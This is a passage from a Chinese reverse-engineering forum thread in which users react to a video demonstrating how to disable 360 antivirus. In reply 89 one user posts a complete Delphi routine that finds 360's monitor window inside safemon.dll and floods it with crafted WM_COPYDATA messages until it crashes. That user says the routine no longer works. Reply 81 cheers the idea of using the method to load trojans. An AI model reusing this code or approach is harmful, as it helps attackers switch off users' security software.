能力值:
( LV2,RANK:10 )
|
-
-
76 楼
求大牛给个链接,百度不到啊
|
能力值:
( LV13,RANK:1760 )
|
-
-
77 楼
http://bbs.pediy.com/showthread.php?t=175483&highlight=shim
之前有兄弟讨论过...
|
能力值:
( LV6,RANK:90 )
|
-
-
78 楼
最讨厌这种 懒得看
|
能力值:
( LV2,RANK:10 )
|
-
-
79 楼
果然好东西,期待demo放出细细研究。
|
能力值:
( LV2,RANK:10 )
|
-
-
80 楼
N久不用杀毒软件了......
|
能力值:
( LV2,RANK:10 )
|
-
-
81 楼
楼主这样做我是非常支持的。
他说明360并不是万能的,另外他透露可以用重启系统的方法干掉360,加载木马也可以用这种方法。
楼主给了大家研究方向和信心。
|
能力值:
( LV2,RANK:10 )
|
-
-
82 楼
哈哈,求来看看
|
能力值:
( LV2,RANK:10 )
|
-
-
83 楼
我只是围观。。。从不用360
|
能力值:
( LV6,RANK:80 )
|
-
-
84 楼
样本在哪里?可以发一个么?
|
能力值:
( LV2,RANK:10 )
|
-
-
85 楼
看了视频,3个字,没意思,根据视频表现猜测,通过修改注册表或替换文件使360运行的时候加载该dll,dll在加载时候退出进程,没啥实用价值
|
能力值:
( LV2,RANK:10 )
|
-
-
86 楼
哎 大家来看帖都是来学东西或者找乐子的 你这个既没有乐子我也没从中学到什么 不过我还是很佩服楼主的勇气的
|
能力值:
( LV8,RANK:130 )
|
-
-
87 楼
还是以前的那个漏洞?到现在还没有补?
|
能力值:
( LV2,RANK:10 )
|
-
-
88 楼
路过~
看lz的方法也并不是只有360才有这个“问题”吧~也许其它防护软件同样有~
重启后加载了你的那个DLL 360的各种exe都挂掉了当然启动不了了~
|
能力值:
( LV3,RANK:20 )
|
-
-
89 楼
方法多的很,例如下面这个(失效几个月了):
procedure Fuck359;
const
szOpcode: array[0..8] of Byte = ($83, $EC, $10, $56, $8D, $44, $24, $04, $50); //其实是查找窗口类名"Q360SafeMonClass"
var
hMod: THandle;
dwGetHwndFun: DWORD;
hWin: HWND;
CopyData: COPYDATASTRUCT;
lpNewBuf: array of Byte;
i: integer;
begin
hMod := GetModuleHandle('safemon.dll');
if (hMod <> 0) then
begin
if (SerachOpcodeFromModule(hMod, PAnsiChar(@szOpcode[0]), sizeof(szOpcode), dwGetHwndFun)) then
begin
asm
pushad;
call dwGetHwndFun;
mov hWin,eax;
popad;
end;
SetLength(lpNewBuf, $1000);
Randomize;
while True do
begin
for i := 0 to $1000 - 1 do lpNewBuf[i] := Random(255);
PDWORD(@lpNewBuf[0])^ := $4348534E; //这个标志很重要
CopyData.dwData := $4D47534D; //类型标示
CopyData.cbData := $1000;
CopyData.lpData := @lpNewBuf[0];
SendMessage(hWin, WM_COPYDATA, 0, LPARAM(DWORD(@CopyData)));
if (not IsWindow(hWin)) then
begin
MessageBox(0, 'Fuck xxx!', '', MB_ICONINFORMATION + MB_TOPMOST);
Break;
end;
Sleep(1000);
end;
end
else
MessageBox(0, 'Not search opcode!', '', MB_ICONINFORMATION + MB_TOPMOST);
end
else
MessageBox(0, 'Not found 359!', '', MB_ICONINFORMATION + MB_TOPMOST);
end;
|
能力值:
( LV3,RANK:20 )
|
-
-
90 楼
他帮助你什么了?录了个视频露了露就帮助到你了?
|
能力值:
( LV2,RANK:10 )
|
-
-
91 楼
那我觉得奇怪了,前不久论坛的ios吧主还不是弄了个破解ihone5锁屏的视频,怎么就看你们一大堆人说好,他同样没有放出代码,你们就不说他,
我算明白了,所谓的趋炎附势!
|
能力值:
( LV2,RANK:10 )
|
-
-
92 楼
|
能力值:
( LV2,RANK:10 )
|
-
-
93 楼
[QUOTE=bestbird;1316790]方法多的很,例如下面这个(失效几个月了):
procedure Fuck359;
const
szOpcode: array[0..8] of Byte = ($83, $EC, $10, $56, $8D, $44, $24, $04, $50); //其实是查找窗口类名"Q360...[/QUOTE]
支持下这位兄弟
|
能力值:
( LV2,RANK:10 )
|
-
-
94 楼
帖子,我从头看到尾。楼主不就是分享了个自己研究的东西吗,不管这个是不是为了吸引眼球,至少这种分享精神是好的吗。为什么就有那么多人说不好呢?看雪论坛,不就是为了让大家交流吗,提倡分享吗?楼主刚开始不发 demo也是很正常的吗,毕竟这涉及到商业软件。现在怎么感觉这论坛就变味了,谁不是从菜鸟过来的。氛围比技术重要。希望坛主整肃一下纪律!
|
能力值:
( LV2,RANK:10 )
|
-
-
95 楼
演示视频怎么看不了
|
能力值:
( LV8,RANK:120 )
|
-
-
96 楼
挺好的。视频没有看。手机客户端你懂的。
|
能力值:
( LV2,RANK:10 )
|
-
-
97 楼
强人啊!!!
|
能力值:
( LV2,RANK:10 )
|
-
-
98 楼
求样本看一看
|
能力值:
( LV2,RANK:10 )
|
-
-
99 楼
没src没bin你说个jb
|
|
|